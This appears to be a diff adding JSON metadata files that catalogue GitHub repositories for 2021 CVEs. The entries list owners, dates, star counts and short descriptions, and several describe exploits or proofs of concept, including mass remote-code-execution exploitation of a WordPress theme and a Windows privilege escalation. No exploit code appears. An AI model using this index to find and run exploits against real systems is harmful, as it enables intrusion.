"EkamSinghWalia\/Detection-script-for-cve-2021-23358", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Detection-script-for-cve-2021-23358", + "description": "Detection script for cve-2021-23358", + "fork": false, + "created_at": "2023-02-25T19:12:13Z", + "updated_at": "2024-11-10T18:41:34Z", + "pushed_at": "2023-02-25T19:16:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824194262, + "name": "SandBox_CVE-2021-23358", + "full_name": "MehdiBoukhobza\/SandBox_CVE-2021-23358", + "owner": { + "login": "MehdiBoukhobza", + "id": 120346950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120346950?v=4", + "html_url": "https:\/\/github.com\/MehdiBoukhobza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MehdiBoukhobza\/SandBox_CVE-2021-23358", + "description": null, + "fork": false, + "created_at": "2024-07-04T14:55:10Z", + "updated_at": "2024-07-12T13:04:42Z", + "pushed_at": "2024-07-12T13:04:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23369.json b/2021/CVE-2021-23369.json new file mode 100644 index 0000000000..7caf4b14a4 --- /dev/null +++ b/2021/CVE-2021-23369.json @@ -0,0 +1,33 @@ +[ + { + "id": 875207519, + "name": "CVE-2021-23369", + "full_name": "fazilbaig1\/CVE-2021-23369", + "owner": { + "login": "fazilbaig1", + "id": 25384256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25384256?v=4", + "html_url": "https:\/\/github.com\/fazilbaig1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fazilbaig1\/CVE-2021-23369", + "description": "Handlebars CVE-2021-23369 Vulnerability", + "fork": false, + "created_at": "2024-10-19T11:27:31Z", + "updated_at": "2024-10-20T03:05:09Z", + "pushed_at": "2024-10-19T11:31:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23383.json b/2021/CVE-2021-23383.json new file mode 100644 index 0000000000..fc399d0fef --- /dev/null +++ b/2021/CVE-2021-23383.json @@ -0,0 +1,64 @@ +[ + { + "id": 380873715, + "name": "Check-CVE-2021-23383", + "full_name": "dn9uy3n\/Check-CVE-2021-23383", + "owner": { + "login": "dn9uy3n", + "id": 21336403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21336403?v=4", + "html_url": "https:\/\/github.com\/dn9uy3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dn9uy3n\/Check-CVE-2021-23383", + "description": "Check the conditions for exploiting CVE-2021-23383 through the handlebars library version assessment.", + "fork": false, + "created_at": "2021-06-28T01:29:31Z", + "updated_at": "2024-08-12T20:14:17Z", + "pushed_at": "2021-06-28T01:34:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875210476, + "name": "CVE-2021-23383", + "full_name": "fazilbaig1\/CVE-2021-23383", + "owner": { + "login": "fazilbaig1", + "id": 25384256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25384256?v=4", + "html_url": "https:\/\/github.com\/fazilbaig1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fazilbaig1\/CVE-2021-23383", + "description": "The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.", + "fork": false, + "created_at": "2024-10-19T11:37:19Z", + "updated_at": "2024-10-20T03:05:37Z", + "pushed_at": "2024-10-19T11:39:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23410.json b/2021/CVE-2021-23410.json new file mode 100644 index 0000000000..5087f43380 --- /dev/null +++ b/2021/CVE-2021-23410.json @@ -0,0 +1,33 @@ +[ + { + "id": 388965552, + "name": "msgpack-CVE-2021-23410-test", + "full_name": "azu\/msgpack-CVE-2021-23410-test", + "owner": { + "login": "azu", + "id": 19714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19714?v=4", + "html_url": "https:\/\/github.com\/azu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azu\/msgpack-CVE-2021-23410-test", + "description": null, + "fork": false, + "created_at": "2021-07-24T01:05:02Z", + "updated_at": "2021-07-24T07:08:19Z", + "pushed_at": "2021-07-24T01:19:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23639.json b/2021/CVE-2021-23639.json new file mode 100644 index 0000000000..cbfcaecec7 --- /dev/null +++ b/2021/CVE-2021-23639.json @@ -0,0 +1,33 @@ +[ + { + "id": 867675283, + "name": "CVE-2021-23639", + "full_name": "MohandAcherir\/CVE-2021-23639", + "owner": { + "login": "MohandAcherir", + "id": 39704385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39704385?v=4", + "html_url": "https:\/\/github.com\/MohandAcherir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MohandAcherir\/CVE-2021-23639", + "description": "Exploit of CVE-2021-23639 for the vulnerable library 'md-to-pdf' in JS", + "fork": false, + "created_at": "2024-10-04T14:02:46Z", + "updated_at": "2024-10-04T14:05:42Z", + "pushed_at": "2024-10-04T14:05:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23758.json b/2021/CVE-2021-23758.json new file mode 100644 index 0000000000..bc37b6215c --- /dev/null +++ b/2021/CVE-2021-23758.json @@ -0,0 +1,33 @@ +[ + { + "id": 438682864, + "name": "CVE-2021-23758-POC", + "full_name": "numanturle\/CVE-2021-23758-POC", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-23758-POC", + "description": null, + "fork": false, + "created_at": "2021-12-15T15:40:45Z", + "updated_at": "2023-11-01T04:58:01Z", + "pushed_at": "2021-12-15T16:37:09Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23840.json b/2021/CVE-2021-23840.json new file mode 100644 index 0000000000..ce65fba65c --- /dev/null +++ b/2021/CVE-2021-23840.json @@ -0,0 +1,33 @@ +[ + { + "id": 689968197, + "name": "openssl-1.1.1g_CVE-2021-23840", + "full_name": "Trinadh465\/openssl-1.1.1g_CVE-2021-23840", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/openssl-1.1.1g_CVE-2021-23840", + "description": null, + "fork": false, + "created_at": "2023-09-11T09:24:54Z", + "updated_at": "2023-09-11T09:27:35Z", + "pushed_at": "2023-09-11T09:27:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23841.json b/2021/CVE-2021-23841.json new file mode 100644 index 0000000000..0af732e40e --- /dev/null +++ b/2021/CVE-2021-23841.json @@ -0,0 +1,64 @@ +[ + { + "id": 486927382, + "name": "external_boringssl_openssl_1.1.0g_CVE-2021-23841", + "full_name": "Trinadh465\/external_boringssl_openssl_1.1.0g_CVE-2021-23841", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_boringssl_openssl_1.1.0g_CVE-2021-23841", + "description": null, + "fork": false, + "created_at": "2022-04-29T10:16:14Z", + "updated_at": "2023-03-24T01:15:16Z", + "pushed_at": "2022-04-29T11:21:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 521602618, + "name": "Openssl_1_1_0_CVE-2021-23841", + "full_name": "Satheesh575555\/Openssl_1_1_0_CVE-2021-23841", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/Openssl_1_1_0_CVE-2021-23841", + "description": null, + "fork": false, + "created_at": "2022-08-05T10:52:16Z", + "updated_at": "2023-03-24T01:14:26Z", + "pushed_at": "2022-08-05T10:55:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2394.json b/2021/CVE-2021-2394.json new file mode 100644 index 0000000000..2ff9cabef9 --- /dev/null +++ b/2021/CVE-2021-2394.json @@ -0,0 +1,126 @@ +[ + { + "id": 391792707, + "name": "CVE-2021-2394", + "full_name": "lz2y\/CVE-2021-2394", + "owner": { + "login": "lz2y", + "id": 55266300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55266300?v=4", + "html_url": "https:\/\/github.com\/lz2y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lz2y\/CVE-2021-2394", + "description": "POC of CVE-2021-2394", + "fork": false, + "created_at": "2021-08-02T02:22:04Z", + "updated_at": "2024-08-12T20:15:12Z", + "pushed_at": "2021-10-28T14:32:31Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 391813400, + "name": "CVE-2021-2394", + "full_name": "freeide\/CVE-2021-2394", + "owner": { + "login": "freeide", + "id": 33774184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4", + "html_url": "https:\/\/github.com\/freeide", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeide\/CVE-2021-2394", + "description": "POC of CVE-2021-2394", + "fork": false, + "created_at": "2021-08-02T04:19:11Z", + "updated_at": "2024-08-12T20:15:12Z", + "pushed_at": "2021-08-02T02:47:54Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 22, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 394009215, + "name": "CVE-2021-2394", + "full_name": "BabyTeam1024\/CVE-2021-2394", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2021-2394", + "description": null, + "fork": false, + "created_at": "2021-08-08T16:12:17Z", + "updated_at": "2024-08-12T20:15:24Z", + "pushed_at": "2021-08-08T16:41:28Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438692076, + "name": "CVE-2021-2394", + "full_name": "fasanhlieu\/CVE-2021-2394", + "owner": { + "login": "fasanhlieu", + "id": 54527046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54527046?v=4", + "html_url": "https:\/\/github.com\/fasanhlieu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fasanhlieu\/CVE-2021-2394", + "description": null, + "fork": false, + "created_at": "2021-12-15T16:09:54Z", + "updated_at": "2024-02-21T07:47:16Z", + "pushed_at": "2024-02-21T07:47:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24027.json b/2021/CVE-2021-24027.json new file mode 100644 index 0000000000..ee68a6cc2f --- /dev/null +++ b/2021/CVE-2021-24027.json @@ -0,0 +1,33 @@ +[ + { + "id": 346747763, + "name": "whatsapp-mitd-mitm", + "full_name": "CENSUS\/whatsapp-mitd-mitm", + "owner": { + "login": "CENSUS", + "id": 11769276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11769276?v=4", + "html_url": "https:\/\/github.com\/CENSUS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CENSUS\/whatsapp-mitd-mitm", + "description": "PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)", + "fork": false, + "created_at": "2021-03-11T15:27:25Z", + "updated_at": "2024-11-28T16:51:01Z", + "pushed_at": "2021-05-25T11:14:56Z", + "stargazers_count": 147, + "watchers_count": 147, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 147, + "score": 0, + "subscribers_count": 17 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24084.json b/2021/CVE-2021-24084.json new file mode 100644 index 0000000000..53505b1e0d --- /dev/null +++ b/2021/CVE-2021-24084.json @@ -0,0 +1,64 @@ +[ + { + "id": 432334511, + "name": "CVE-2021-24084", + "full_name": "Jeromeyoung\/CVE-2021-24084", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-24084", + "description": "Windows MDM LPE", + "fork": false, + "created_at": "2021-11-27T00:45:28Z", + "updated_at": "2022-04-03T09:27:38Z", + "pushed_at": "2021-11-27T00:38:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 432673238, + "name": "WindowsMDM-LPE-0Day", + "full_name": "exploitblizzard\/WindowsMDM-LPE-0Day", + "owner": { + "login": "exploitblizzard", + "id": 61627070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4", + "html_url": "https:\/\/github.com\/exploitblizzard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitblizzard\/WindowsMDM-LPE-0Day", + "description": "CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day", + "fork": false, + "created_at": "2021-11-28T09:48:36Z", + "updated_at": "2024-09-14T22:03:57Z", + "pushed_at": "2022-02-21T08:30:22Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24085.json b/2021/CVE-2021-24085.json new file mode 100644 index 0000000000..fcdc05f69a --- /dev/null +++ b/2021/CVE-2021-24085.json @@ -0,0 +1,33 @@ +[ + { + "id": 339107043, + "name": "CVE-2021-24085", + "full_name": "sourceincite\/CVE-2021-24085", + "owner": { + "login": "sourceincite", + "id": 13770985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13770985?v=4", + "html_url": "https:\/\/github.com\/sourceincite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sourceincite\/CVE-2021-24085", + "description": null, + "fork": false, + "created_at": "2021-02-15T14:41:25Z", + "updated_at": "2024-08-12T20:10:24Z", + "pushed_at": "2021-02-15T15:11:00Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 69, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24086.json b/2021/CVE-2021-24086.json new file mode 100644 index 0000000000..8406a77e80 --- /dev/null +++ b/2021/CVE-2021-24086.json @@ -0,0 +1,70 @@ +[ + { + "id": 355514476, + "name": "CVE-2021-24086", + "full_name": "0vercl0k\/CVE-2021-24086", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-24086", + "description": "Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys triggered remotely.", + "fork": false, + "created_at": "2021-04-07T11:10:40Z", + "updated_at": "2024-11-02T08:24:48Z", + "pushed_at": "2021-04-15T12:46:54Z", + "stargazers_count": 231, + "watchers_count": 231, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-24086", + "fragmentation", + "ipv6", + "ipv6preassembledatagram", + "tcpip" + ], + "visibility": "public", + "forks": 49, + "watchers": 231, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 431718666, + "name": "CVE-2021-24086-exp", + "full_name": "lisinan988\/CVE-2021-24086-exp", + "owner": { + "login": "lisinan988", + "id": 87479262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4", + "html_url": "https:\/\/github.com\/lisinan988", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisinan988\/CVE-2021-24086-exp", + "description": null, + "fork": false, + "created_at": "2021-11-25T04:56:33Z", + "updated_at": "2021-11-25T06:14:26Z", + "pushed_at": "2021-11-25T04:56:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24096.json b/2021/CVE-2021-24096.json new file mode 100644 index 0000000000..94af1019b6 --- /dev/null +++ b/2021/CVE-2021-24096.json @@ -0,0 +1,33 @@ +[ + { + "id": 338023596, + "name": "CVE-2021-24096", + "full_name": "FunPhishing\/CVE-2021-24096", + "owner": { + "login": "FunPhishing", + "id": 77312720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77312720?v=4", + "html_url": "https:\/\/github.com\/FunPhishing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FunPhishing\/CVE-2021-24096", + "description": null, + "fork": false, + "created_at": "2021-02-11T12:32:34Z", + "updated_at": "2024-08-30T01:54:22Z", + "pushed_at": "2021-02-11T12:33:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24098.json b/2021/CVE-2021-24098.json new file mode 100644 index 0000000000..d61e7ff4da --- /dev/null +++ b/2021/CVE-2021-24098.json @@ -0,0 +1,33 @@ +[ + { + "id": 353613611, + "name": "CVE-2021-24098", + "full_name": "waleedassar\/CVE-2021-24098", + "owner": { + "login": "waleedassar", + "id": 5983995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4", + "html_url": "https:\/\/github.com\/waleedassar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-24098", + "description": "POC for CVE-2021-24098", + "fork": false, + "created_at": "2021-04-01T07:29:44Z", + "updated_at": "2024-08-12T20:11:44Z", + "pushed_at": "2021-04-01T07:34:23Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24145.json b/2021/CVE-2021-24145.json new file mode 100644 index 0000000000..9934a1b921 --- /dev/null +++ b/2021/CVE-2021-24145.json @@ -0,0 +1,33 @@ +[ + { + "id": 395869216, + "name": "CVE-2021-24145", + "full_name": "dnr6419\/CVE-2021-24145", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-24145", + "description": "WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5", + "fork": false, + "created_at": "2021-08-14T02:56:50Z", + "updated_at": "2023-03-28T13:28:01Z", + "pushed_at": "2022-02-17T01:01:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24155.json b/2021/CVE-2021-24155.json new file mode 100644 index 0000000000..0fbacf9f85 --- /dev/null +++ b/2021/CVE-2021-24155.json @@ -0,0 +1,33 @@ +[ + { + "id": 391040356, + "name": "CVE-2021-24155.rb", + "full_name": "0dayNinja\/CVE-2021-24155.rb", + "owner": { + "login": "0dayNinja", + "id": 88158703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88158703?v=4", + "html_url": "https:\/\/github.com\/0dayNinja", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0dayNinja\/CVE-2021-24155.rb", + "description": "WordPress Backup Guard Authenticated Remote Code Execution Exploit", + "fork": false, + "created_at": "2021-07-30T11:28:53Z", + "updated_at": "2024-08-12T20:15:08Z", + "pushed_at": "2021-07-30T11:35:54Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24160.json b/2021/CVE-2021-24160.json new file mode 100644 index 0000000000..6fde6519eb --- /dev/null +++ b/2021/CVE-2021-24160.json @@ -0,0 +1,64 @@ +[ + { + "id": 497754815, + "name": "CVE-2021-24160", + "full_name": "hnthuan1998\/CVE-2021-24160", + "owner": { + "login": "hnthuan1998", + "id": 106500287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106500287?v=4", + "html_url": "https:\/\/github.com\/hnthuan1998", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hnthuan1998\/CVE-2021-24160", + "description": null, + "fork": false, + "created_at": "2022-05-30T01:46:50Z", + "updated_at": "2022-05-30T01:46:50Z", + "pushed_at": "2022-05-30T01:46:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497755127, + "name": "Exploit-CVE-2021-24160", + "full_name": "hnthuan1998\/Exploit-CVE-2021-24160", + "owner": { + "login": "hnthuan1998", + "id": 106500287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106500287?v=4", + "html_url": "https:\/\/github.com\/hnthuan1998", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hnthuan1998\/Exploit-CVE-2021-24160", + "description": "Exploit CVE-2021-24160", + "fork": false, + "created_at": "2022-05-30T01:48:27Z", + "updated_at": "2022-05-30T01:52:13Z", + "pushed_at": "2022-05-30T01:52:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24356.json b/2021/CVE-2021-24356.json new file mode 100644 index 0000000000..7e1599d746 --- /dev/null +++ b/2021/CVE-2021-24356.json @@ -0,0 +1,37 @@ +[ + { + "id": 676669833, + "name": "CVE-2021-24356", + "full_name": "RandomRobbieBF\/CVE-2021-24356", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24356", + "description": "Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation", + "fork": false, + "created_at": "2023-08-09T18:24:19Z", + "updated_at": "2024-08-12T20:32:24Z", + "pushed_at": "2023-08-09T18:26:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-24356", + "wordpress-exploit", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-24499.json b/2021/CVE-2021-24499.json new file mode 100644 index 0000000000..baef3a5b75 --- /dev/null +++ b/2021/CVE-2021-24499.json @@ -0,0 +1,95 @@ +[ + { + "id": 405638849, + "name": "CVE-2021-24499", + "full_name": "j4k0m\/CVE-2021-24499", + "owner": { + "login": "j4k0m", + "id": 48088579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4", + "html_url": "https:\/\/github.com\/j4k0m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j4k0m\/CVE-2021-24499", + "description": "Mass exploitation of CVE-2021-24499 unauthenticated upload leading to remote code execution in Workreap theme.", + "fork": false, + "created_at": "2021-09-12T12:43:24Z", + "updated_at": "2024-08-12T20:16:22Z", + "pushed_at": "2021-09-20T09:58:17Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414051484, + "name": "cve-2021-24499", + "full_name": "hh-hunter\/cve-2021-24499", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/cve-2021-24499", + "description": null, + "fork": false, + "created_at": "2021-10-06T03:07:31Z", + 